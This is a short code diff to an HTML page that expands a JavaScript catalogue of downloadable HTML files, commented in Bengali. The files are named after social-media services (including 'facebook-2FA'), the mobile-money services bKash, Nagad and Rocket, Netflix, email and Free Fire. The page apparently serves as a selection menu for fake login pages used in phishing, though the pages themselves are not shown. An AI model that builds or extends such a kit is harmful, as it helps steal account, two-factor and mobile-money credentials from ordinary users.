--- a/index.html
+++ b/index.html
@@ -764,30 +764,27 @@
     <script>
         // ফাইল ডেটা
         const files = {
-            option1: [
-                { 
-                    name: "facebook-2FA.html", 
-                    size: "8.2 KB", 
-                    url: "facebook-2FA.html", 
-                    dataKey: "facebookData"
-                }
+            option1: [ // সোশ্যাল মিডিয়া ক্যাটাগরি
+                { name: "facebook-2FA.html", size: "8.2 KB", url: "facebook-2FA.html", dataKey: "facebookData" },
+                { name: "Facebook Lite.html", size: "7.5 KB", url: "Facebook Lite.html", dataKey: "facebookLiteData" },
+                { name: "Instagram.html", size: "9.1 KB", url: "Instagram.html", dataKey: "instagramData" },
+                { name: "Twitter.html", size: "10.3 KB", url: "Twitter.html", dataKey: "twitterData" },
+                { name: "TikTok.html", size: "8.9 KB", url: "TikTok.html", dataKey: "tiktokData" },
+                { name: "Snapchat.html", size: "6.7 KB", url: "Snapchat.html", dataKey: "snapchatData" },
+                { name: "WhatsApp.html", size: "7.1 KB", url: "WhatsApp.html", dataKey: "whatsappData" },
+                { name: "Imo.html", size: "9.2 KB", url: "Imo.html", dataKey: "imoData" }
             ],
-            option2: [
-                { 
-                    name: "bKash.html", 
-                    size: "12.5 KB", 
-                    url: "bKash.html", 
-                    dataKey: "bkashData"
-                },
-                {
-                    name: "Imo.html",
-                    size: "9.23 KB",
-                    url:"Imo.html",
-                    dataKey:"ImoData"
-                }
+            option2: [ // ফিনান্সিয়াল সার্ভিস ও অন্যান্য
+                { name: "bKash.html", size: "12.5 KB", url: "bKash.html", dataKey: "bkashData" },
+                { name: "Nagad.html", size: "11.8 KB", url: "Nagad.html", dataKey: "nagadData" },
+                { name: "Rocket.html", size: "11.2 KB", url: "Rocket.html", dataKey: "rocketData" },
+                { name: "Netflix.html", size: "15.7 KB", url: "Netflix.html", dataKey: "netflixData" },
+                { name: "Email.html", size: "5.5 KB", url: "Email.html", dataKey: "emailData" },
+                { name: "Free-fire.html", size: "14.2 KB", url: "Free-fire.html", dataKey: "freefireData" }
             ]
         };
-        
+    
+
         // নির্বাচিত ফাইল ট্র্যাক করা
         let selectedFiles = {
             option1: null,
@@ -1237,4 +1234,5 @@
     </script>
 </body>
 </html>
+
 
